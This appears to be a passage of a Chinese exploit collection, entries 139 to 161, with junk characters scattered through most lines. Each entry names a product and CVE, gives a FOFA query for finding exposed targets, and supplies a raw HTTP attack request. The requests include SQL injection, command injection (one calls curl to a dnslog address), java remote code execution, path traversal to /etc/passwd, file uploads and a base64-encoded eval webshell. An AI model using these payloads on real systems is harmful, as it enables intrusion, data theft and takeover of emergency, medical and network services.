% \) ^2 N! |3 m# T# i8 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
( i4 a, R/ B. {2 Q! r) c( x3 Y" g& HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 |/ E9 ?5 d0 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 c( ~' U3 f8 t8 f: v9 w: j5 G9 QAccept-Encoding: gzip, deflate, br
: N" l5 s* F; ]Connection: close
$ Y" H9 \! o6 ]' m7 `; \$ IUpgrade-Insecure-Requests: 1) \! T1 a6 e5 S

- F; _8 L# K/ p* x2 F- O1 M% |9 f! X3 j6 z& a2 A
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
, o! Q7 {/ |* J( N  A" nCVE-2024-2622
! ^, J. k; v& w0 P6 GFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"1 q4 x* Y% P" @4 @  a
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
2 E, T8 U! o6 M  z+ E& v/ l9 s) WHost: x.x.x.x
/ b- I8 `5 |. |+ o8 U& eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ J) {) U) D! b2 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ g0 `8 p  ~' u6 K; L- w# t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" x8 K! a$ {4 K3 L% `
Accept-Encoding: gzip, deflate, br/ }# q& k7 b5 C, ~' N) C
Connection: close2 {/ A, x# Z/ @, t, K" K
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk; J7 K& _" O6 N
Upgrade-Insecure-Requests: 1
0 ?: c0 B( B) h2 W* p# }7 @
. R, ^0 E8 M) j% r5 ^! G1 y: x0 S  M  G- R! U, g) {
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
; @7 B$ V9 U8 j) T' y+ DCVE-2024-25662 Q' Q& J! Z) q6 A# m0 ?4 i: L
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
! u2 z9 }- y; N% B, y0 F" q. X$ |GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
4 p# z" M0 I# F9 _Host: x.x.x.x' G! B# B$ r. J/ ]3 k" b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( B& s* H9 C0 [( L% ~9 R7 O) }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# u! ^, C7 R3 O' t% w& W6 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! H, w( Q4 F; B$ S3 g
Accept-Encoding: gzip, deflate, br
: a; N" C2 M2 C3 F1 X4 u" T7 a' XConnection: close8 S* Q( a; t4 j/ k0 W" `
Cookie: authcode=h8g94 F( l. }# f  q9 d
Upgrade-Insecure-Requests: 1
6 W" C: k; V% p7 F$ A
8 W8 ~1 Z2 n' x! i
0 n: N+ f3 \5 a" S% w141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入& p2 Q% v% A' O" ~9 o
FOFA:body="指挥调度管理平台"
8 Y5 b& V7 B. s; D& j8 ]% ]) P$ q5 NPOST /app/ext/ajax_users.php HTTP/1.1" h: j6 h9 J. v2 w* G
Host: your-ip) V0 d! F8 J/ J% s
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
' ?: r. ]% `) P! {Content-Type: application/x-www-form-urlencoded, B* T5 ]- l  _& }

! H% K' X9 I: l5 @, f5 @
  o4 Z) A- m: H2 Ddep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
& B4 i- }2 o& s% A+ W! d8 P1 g( [$ a" N! \9 R+ _

& L6 A9 y  ?, _- i142. CMSV6车辆监控平台系统中存在弱密码
, l! F5 ~6 j4 c0 |, _# i  `+ R: DCVE-2024-29666( o. _5 A& z8 y5 a
FOFA:body="/808gps/") K6 I; `' P$ ]" M6 _
admin/admin
9 a- Z  M, m, u8 @1 ?% i143. Netis WF2780 v2.1.40144 远程命令执行
/ U& u* x) F8 ^) N) dCVE-2024-25850# I* t9 N4 K4 j- l
FOFA:title='AP setup' && header='netis'
7 O* l# z# J, G- HPAYLOAD& s/ }7 a$ _# L* A3 W
  @# G% N" t/ r' P8 }
144. D-Link nas_sharing.cgi 命令注入8 e$ }+ P8 a. |5 Y
FOFA:app="D_Link-DNS-ShareCenter"5 l$ _9 S2 I: L) D. ~! P& I
system参数用于传要执行的命令, y- u1 ?7 Z; E* l( T9 X1 ]4 b
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1) X  E3 ?& R/ S; s* A" U8 q0 Z" l
Host: x.x.x.x
" S0 A7 j8 j6 F2 O! @User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
2 x# m- S: W! G4 [: ?2 Z  |. pConnection: close+ A' s9 C- g) a: l) f1 s: f/ ]4 m
Accept: */*+ I) B- A! ^2 m; }9 y0 m
Accept-Language: en
* p& d4 g0 a9 ?# vAccept-Encoding: gzip
3 u$ f8 ~8 _) U3 {  R6 z( S; D$ ~# ~4 P3 X$ G

( ?4 |1 y8 w3 j145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
  t: k6 o9 `. T: s; G  a9 j; NCVE-2024-3400
! r- P+ K5 C) I* E7 |- l3 l: N; ~FOFA:icon_hash="-631559155"
+ M" I5 o. V$ cGET /global-protect/login.esp HTTP/1.10 T3 Y; {6 @6 h  E. u
Host: 192.168.30.112:1005; L4 f( Z5 \$ ], K( a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84$ o3 n" j% J1 ], z, l; ^# W
Connection: close
# p7 P* L/ k9 H- ^9 ?1 kCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
( P1 U: h9 |7 J7 E; {Accept-Encoding: gzip4 a  w* k6 w: E  `% S
1 Z& P* B* f6 h$ I8 [' `

( T) o- I8 x/ K146. MajorDoMo thumb.php 未授权远程代码执行/ d( }" _' u3 d4 m7 w* \
CNVD-2024-02175
% E; U- b$ _. u$ r" `FOFA:app="MajordomoSL"0 _! `3 i( O- S4 T) ]# O
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
7 Z* g5 z+ r) G, x& S$ ?! fHost: x.x.x.x, X) L4 x4 t6 [4 k/ P; g9 @' S1 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
+ i$ _1 ?$ ], B, L2 Z8 ]& z# b$ J- FAccept-Charset: utf-8
' H! ^! N5 `) I2 \0 ~; q$ RAccept-Encoding: gzip, deflate
7 g# a$ ^: R$ G7 M, v5 ?Connection: close
! a9 Z8 w4 h2 C( A6 ]9 W% Z! L9 X8 m1 I
* f( A4 W3 U5 D
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
8 B' r" A4 R- q' u6 d& s/ mCVE-2024-32399
. K  W; M. I( xFOFA:body="RaidenMAILD"
( F+ h6 ?8 H. |- FGET /webeditor/../../../windows/win.ini HTTP/1.1
+ Y" Y1 b; I/ I* C; ^" O$ zHost: 127.0.0.1:81
) i6 a( E3 f$ l. f+ z+ u. e$ ACache-Control: max-age=0
& J  _  s* I  bConnection: close& U; U5 J. u4 }" {  b- K
& y# \  {9 w5 Y+ ~+ C' j

! ?1 R' Q& P% z; f) R148. CrushFTP 认证绕过模板注入8 Z# x/ l+ W1 x7 ?2 j6 ?
CVE-2024-4040' l, n, h+ w% M; u
FOFA:body="CrushFTP"
, G; Y% a1 s0 O3 c, Z# i. l, w% \) g2 }PAYLOAD# ]1 d' \/ w" A+ |1 F) O( B% ?

% C4 @3 f* ]& S# Y# |0 r' v# O149. AJ-Report开源数据大屏存在远程命令执行7 G% _/ v- U$ Q2 @
FOFA:title="AJ-Report"8 E, l$ U% o- f& h; n+ [

& q5 d8 \# V3 B+ A; P/ iPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
% f% _8 U4 `( }1 t; nHost: x.x.x.x
$ R, r, o& r. q/ EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) T' b3 w7 I. |1 P9 ~% h0 x* KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  E# {) Q1 C% ]7 z* o+ O, y
Accept-Encoding: gzip, deflate, br
) B$ W/ p5 H! D, \' r& p- XAccept-Language: zh-CN,zh;q=0.9
9 H% D& l8 I7 Y3 [* R$ \. A  {Content-Type: application/json;charset=UTF-8: t6 p. h! i) @/ X4 o& r9 {
Connection: close+ _; r9 o$ U, C( M5 S

3 e2 @9 e$ i1 G" P+ I% B{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
6 {8 |. j+ S0 \& g& ~  C3 \+ {8 ^: i, D7 R* v. P# {
150. AJ-Report 1.4.0 认证绕过与远程代码执行2 |! z3 @! x4 Y4 w; O
FOFA:title="AJ-Report"
1 `6 u2 }3 L+ L; f( u4 Q7 PPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1' C* V- U  o; I3 x& s" W: j0 v; W
Host: x.x.x.x
! A+ t5 z# x$ g0 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; A6 W5 L% j  FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 r2 o" s& l* Y5 b4 @1 F
Accept-Encoding: gzip, deflate, br
9 o, n. {  o  c+ vAccept-Language: zh-CN,zh;q=0.9& p4 L& m  `* S8 X: [6 P+ v
Content-Type: application/json;charset=UTF-8+ X" d3 ~2 V# g! K% O' b- R  b
Connection: close# d, Z1 q( a3 b+ g& p4 p* z
Content-Length: 339
8 A' o! A0 ~: c3 k) {4 j# g& b% R; h+ O) l  ~1 }- c
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}- @; A. t6 Z8 j4 ]: |  q" o

4 T3 C1 s; Z# B  t8 O& s7 Q
6 T+ K, Y! d; Q% j/ G151. AJ-Report 1.4.1 pageList sql注入( ?9 P6 `; V' Y4 r7 \
FOFA:title="AJ-Report"
  J; q8 x! Q5 M. FGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.19 Q8 o" Z3 ]0 N4 M+ l$ j
Host: x.x.x.x# G9 D3 `* W  }6 M1 @) h& t3 F8 f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15  H8 \( R6 Z" ]4 p
Connection: close
5 h2 ]" h2 T7 u: M, J( E4 q3 TAccept-Encoding: gzip& Y4 V2 v! X6 O; j; ?+ j

% G$ T) S5 h- T9 {% K: z7 |2 z% J: Y! I
152. Progress Kemp LoadMaster 远程命令执行
0 v: [  s; F0 {CVE-2024-12129 L! O- g, X) z  x
LoadMaster <= 7.2.59.2 (GA)0 O/ W4 `! t* ~7 f( V* N
LoadMaster<=7.2.54.8 (LTSF)
9 n" ~2 n( L- t" hLoadMaster <= 7.2.48.10 (LTS)
: {$ ~- m) {) yFOFA:body="LoadMaster"
6 R7 L! u: ^* N1 LJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码( B% T: _# \3 T
GET /access/set?param=enableapi&value=1 HTTP/1.1& i# ~% i9 ^. m& Z0 ~3 \
Host: x.x.x.x
* v5 D8 p3 X& [9 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
# i6 O$ x7 V9 x7 _1 `' IConnection: close; S5 _5 P3 X2 n2 U
Accept: */*& o- U8 G3 S& p* q
Accept-Language: en
8 @. u+ t; A; ~8 uAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=1 g# o* p) y# V9 W: L3 `+ v5 z
Accept-Encoding: gzip
3 n6 ?! X9 q% P. Q
5 ~6 z) i/ V% e% C" w+ j* E3 Z/ c2 Y  o$ o4 A5 B6 t
153. gradio任意文件读取/ c" W" h, O: |# t' j# c
CVE-2024-1561FOFA:body="__gradio_mode__"# w" W5 [1 Y9 T# R1 n. a/ J
第一步,请求/config文件获取componets的id* k3 i  k  R1 r! `
http://x.x.x.x/config. U+ m7 s' }' R+ j  _$ G3 H

1 b# n3 C3 }; \) p
5 G% l* y; E, X% R& w第二步,将/etc/passwd的内容写入到一个临时文件1 Z; E) p7 K8 q
POST /component_server HTTP/1.1. ^8 N( P3 F  t2 T8 U# a5 _
Host: x.x.x.x$ @, U, ^" F9 x4 u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3" C2 J" p5 m. `$ v+ r9 }
Connection: close
, F! V' v" V) m/ z' V8 ]4 `Content-Length: 115
3 m6 T2 G, a" I0 {$ ZContent-Type: application/json' M/ }! r6 t0 J- y
Accept-Encoding: gzip$ a1 i$ ]5 {" g/ v2 w# C
6 `5 l- _/ O7 s6 ]! E
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
/ e1 e; a4 \9 ?) F7 E
+ x" f" R& i0 {1 u! p' G. u- w' W  q! L: D/ L0 B: i
第三步访问
+ M  L; M# }5 T+ `9 [* C& hhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
0 Y2 k" `, l4 R" z: N1 N. |$ L- t) @, c* l- I

) l+ l, I% ^8 A7 e5 B8 O154. 天维尔消防救援作战调度平台 SQL注入* q0 w" P% D! Q; R2 y& I. _
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
% V% g* g: U, B/ w  F8 _POST /twms-service-mfs/mfsNotice/page HTTP/1.1
1 L# ]: y0 y! I6 S0 BHost: x.x.x.x3 M; {" E$ D- j3 ]( U$ a0 }* b
Content-Length: 106
  c- ~3 P0 C1 S+ h9 Z  {# A+ jCache-Control: max-age=0
* Q0 m. @' J3 o$ Z9 DUpgrade-Insecure-Requests: 1% Z6 p3 v+ ~2 h# @1 |9 Y
Origin: http://x.x.x.x
  W0 p; P9 j9 j+ Y# M  KContent-Type: application/json
8 A' z+ Q; \3 f% x4 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.360 e/ O$ Y( E  {; A& W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, o; _) Z1 G% n$ |2 {9 Y
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page. V6 j! h& H" N( }& m* q
Accept-Encoding: gzip, deflate3 c# Q! K2 g+ J2 H5 s* d" F7 p
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
, W" b& b* X% S0 I2 BConnection: close3 O8 U* g9 L# R+ P* n
8 R0 k5 r" t4 @; f
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
- N% M) B% D8 C5 @7 m( ^3 K& ~
' i* P! i8 }, A
. E, p1 ~, ?6 y3 y! m4 R155. 六零导航页 file.php 任意文件上传
! T# _- ^. k/ p% HCVE-2024-34982* a. y+ j3 \9 b( s. Y$ }4 N0 i
FOFA:title=="上网导航 - LyLme Spage"- d# c5 x/ @; }' ~  q
POST /include/file.php HTTP/1.1
: B/ H0 ^. X& D& }( M0 sHost: x.x.x.x
" G/ R# O0 ^7 G- W8 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
; Z: Z3 i- N& {( nConnection: close
2 l% i$ s  |" L; O  B2 qContent-Length: 232# C1 C6 \8 R- p) i) v
Accept: application/json, text/javascript, */*; q=0.01
+ V3 J$ _8 l( @: {Accept-Encoding: gzip, deflate, br+ \( X! M& h5 G7 d$ a0 V; G" ^3 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% w" f8 [7 O- _/ m7 w, O" BContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
, Q- q. z& C8 E7 T6 P6 O1 mX-Requested-With: XMLHttpRequest; |0 e( i0 F; D; A0 n0 Q8 T7 p

: s: y: w' h; F% H7 {5 j. }9 M-----------------------------qttl7vemrsold314zg0f
$ S- h6 P2 N2 g' z! GContent-Disposition: form-data; name="file"; filename="test.php"7 l+ W0 |5 O9 i; P
Content-Type: image/png
* ]3 Z% R) P- r( F9 r- F" _' b' E7 z- A5 N
<?php phpinfo();unlink(__FILE__);?>. a7 n* Y- S( p, X3 i- l) n
-----------------------------qttl7vemrsold314zg0f--
. j3 t) Q1 O# W2 m* B4 }2 F
$ t4 C( c$ p# Q. f/ K3 J
% R6 J: z; w! \5 c6 N/ R& B' x+ V( K访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
" q) H% S* A4 F9 O) k: t
# m5 |: g- ~8 K1 O$ y, l  F156. TBK DVR-4104/DVR-4216 操作系统命令注入9 v: S+ _/ X( S% Q) ?1 C
CVE-2024-3721! n( F9 t: V" c8 g# r
FOFA:"Location: /login.rsp"( m0 W6 X) Q7 M3 H: b9 m6 O
·TBK DVR-4104# ?2 F0 B" `4 m( n+ h
·TBK DVR-42166 |, ]. N/ ^# \" Y  j
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"# T& g0 l1 B/ _7 X9 E+ ]/ K: P* H7 b* r
; H/ A+ l5 Z5 A+ Y; H* `3 O
. ^# F5 P& u  y$ L
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
; S" X6 \: p; o, I' D0 d" N5 ^- EHost: x.x.x.x
- ?# T% W) P- x* k& a* `User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# A- ~* ~, S7 V* ^4 i
Connection: close( `) |, U7 y  ?# N
Content-Length: 0% R; V+ Q* N5 u3 ~& X9 N' l1 J
Cookie: uid=1
6 v. v5 _2 O0 L, x% RAccept-Encoding: gzip
% g7 `4 I' r1 [$ B  r1 X- `* h2 Q" u( m* ]# J
5 k7 h  \* _$ x2 ]: y& m
157. 美特CRM upload.jsp 任意文件上传: u- d; M0 T& ^  d0 N" g
CNVD-2023-069715 H$ q, [4 k5 \
FOFA:body="/common/scripts/basic.js"% }! `! `% @7 E. N+ D4 _
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1" H5 }5 j/ R2 a5 l0 N0 T; I
Host: x.x.x.x
* A7 E/ c/ r0 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36- Z# h% ^/ |' Q. }
Content-Length: 709% U4 T& r/ Y1 |" w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 V4 ?2 c9 K2 k2 }: O- d. tAccept-Encoding: gzip, deflate4 v7 K* Q) w2 c
Accept-Language: zh-CN,zh;q=0.9
9 s7 S/ G; Q5 ]5 yCache-Control: max-age=08 g6 h2 \' C- D3 w% @- p) p
Connection: close4 h3 [9 s9 A8 O; p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
% q4 [2 t! Q3 O( |% P$ w# tUpgrade-Insecure-Requests: 1
/ h: \. D) N  \5 {4 F! t" n- I" a: }
------WebKitFormBoundary1imovELzPsfzp5dN
0 {; b: M( x# `% G7 NContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"$ T; }% V: A2 g/ W9 X0 [
Content-Type: application/octet-stream) C) y+ N8 H* K  V

6 x! w0 a! P4 f3 @nyhelxrutzwhrsvsrafb
% D* ^6 F) J& @2 Q" g, [------WebKitFormBoundary1imovELzPsfzp5dN
  b% Y/ m0 t! Q. }% k8 OContent-Disposition: form-data; name="key"" R* V% z5 A$ p$ D3 L* q

+ C; ]7 d- a3 D# }+ E: `0 Fnull
+ ^8 x$ r1 e2 A7 y+ w------WebKitFormBoundary1imovELzPsfzp5dN
" B2 S( \0 l& g7 }Content-Disposition: form-data; name="form"
" e7 M+ `: `2 w
5 H# ~' Z# m% Vnull0 N3 v/ f7 ^+ @; H3 ~
------WebKitFormBoundary1imovELzPsfzp5dN
; J. U# ^; f% P! M9 w. GContent-Disposition: form-data; name="field". T" n3 n/ T( f: z0 D/ K

; ^" o6 A" I2 b; F: ]# H' |null
6 T+ W% L$ t' S------WebKitFormBoundary1imovELzPsfzp5dN
9 |' h8 w0 `3 H& RContent-Disposition: form-data; name="filetitile"7 g, d" }: C2 i6 R5 C
* O& E" O0 ?$ F( O7 y  j
null
( t! U4 Q% o* b5 \" k2 R8 b------WebKitFormBoundary1imovELzPsfzp5dN
8 j* Y" w, C! C" x8 L6 z! K' rContent-Disposition: form-data; name="filefolder"
- M3 K. X+ W9 G4 k: u- ^
( |" b7 m) u  N  `# A3 L5 cnull+ x. F$ K) {1 J4 ^
------WebKitFormBoundary1imovELzPsfzp5dN--
2 t6 M  J" B9 d6 W' L# C+ r
  }3 K) t3 p! [5 r: r6 X( V% N4 }2 {; J6 G+ T3 }$ C
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
6 X* p2 T# i9 q) o) h9 J
, \* |" y$ ~: y, P* o, h! b158. Mura-CMS-processAsyncObject存在SQL注入
5 u9 V0 @- ^+ J! p3 v8 V' cCVE-2024-32640' T; m# ^- F4 p
FOFA:"Generator: Masa CMS"+ C2 h7 w1 R/ s* q% ?7 A
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
, x4 d2 \* v9 xHost: {{Hostname}}
6 s) ]; E. \- u0 |- j3 gContent-Type: application/x-www-form-urlencoded
& N) r; ?" S2 \9 M/ E# j; _
1 ?) \8 F- z. Z. _+ l, J% [object=displayregion&contenthistid=x\'&previewid=1
3 n* l3 k" ?- R5 |
' a! E0 N6 V7 K% H6 P9 J1 ~
* y4 |5 {& p. F- K159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传% b$ t( V7 g# o. r9 a
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")* r3 g, L; G4 j  Y, g
POST /webservices/WebJobUpload.asmx HTTP/1.1" ?- Z, \- k3 K  n  t5 k) H8 y
Host: x.x.x.x% |( N) E9 s& G9 h, f3 [3 k7 z. [& g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36) e3 l3 X) a/ N% y+ \, [% g' R
Content-Length: 1080) ?2 G' b- b6 y* q
Accept-Encoding: gzip, deflate
8 E3 _, [7 d  Q& bConnection: close" B; d3 I) ]2 H5 x5 Y# O& v
Content-Type: text/xml; charset=utf-83 y6 T2 B, ^+ B8 \2 k9 p
Soapaction: "http://rainier/jobUpload"
9 @+ y5 c- u. H- i. w4 o! G% r0 n6 _/ U& p6 k: Y
<?xml version="1.0" encoding="utf-8"?>( j: p  \8 G' i. _9 [+ A
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">/ W4 o5 H/ R9 O5 @5 N3 ]
<soap:Body>
% J3 e. W' b4 c<jobUpload xmlns="http://rainier">& O; i$ l5 O3 h/ C
<vcode>1</vcode>
: t' C: X' _7 R5 `4 j2 |+ l<subFolder></subFolder>
1 d8 ~# Z$ W& i+ ?, f<fileName>abcrce.asmx</fileName>- f' t3 Y! T9 X: L3 ^
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
0 K& S. O. ]; Y$ s0 {</jobUpload>
( K" y. r. m6 D</soap:Body>. @$ b0 m1 @* E# d* H
</soap:Envelope>5 ^  w% W& s6 ^. ?9 q. D" t( M6 i* t
, k6 Q" O/ P- K# A
5 l* T3 E+ Q$ U( u
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")5 k9 z9 z* K& P# Z) e
2 Q+ q6 M  m9 s
' k: S! U3 M1 {0 y# q1 q) S6 A
160. Sonatype Nexus Repository 3目录遍历与文件读取
( B- l' F* S: dCVE-2024-4956
* D* |1 t/ Y  Y/ E5 lFOFA:title="Nexus Repository Manager"
; J/ y! C! S" d" z! F$ |% qGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.12 s7 C0 ]/ {) q  e# E
Host: x.x.x.x9 G! T% Y2 s+ o' Z& [( }' `0 S
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
  U* l5 t/ r0 o. x$ b9 {Connection: close
( j  [6 L. u$ w" a" R0 E2 pAccept: */*" }- E! n: i2 Y; v5 y
Accept-Language: en
( }- t. G+ l8 R" xAccept-Encoding: gzip
" C2 k, D: }1 A+ h6 r9 O) F; t
. [' t3 ]4 o# b# q% b( D
7 q' E4 f- w6 P+ }161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
# ]) n7 s* D* }( @' _FOFA:body="/KT_Css/qd_defaul.css"
, [7 r' M0 ]1 l/ [8 }第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
3 [- [) |) X* O1 S" B& KPOST /Webservice.asmx HTTP/1.1
/ o+ s+ N" e# d. q+ fHost: x.x.x.x/ B0 v7 b9 L* V% M5 ?1 \
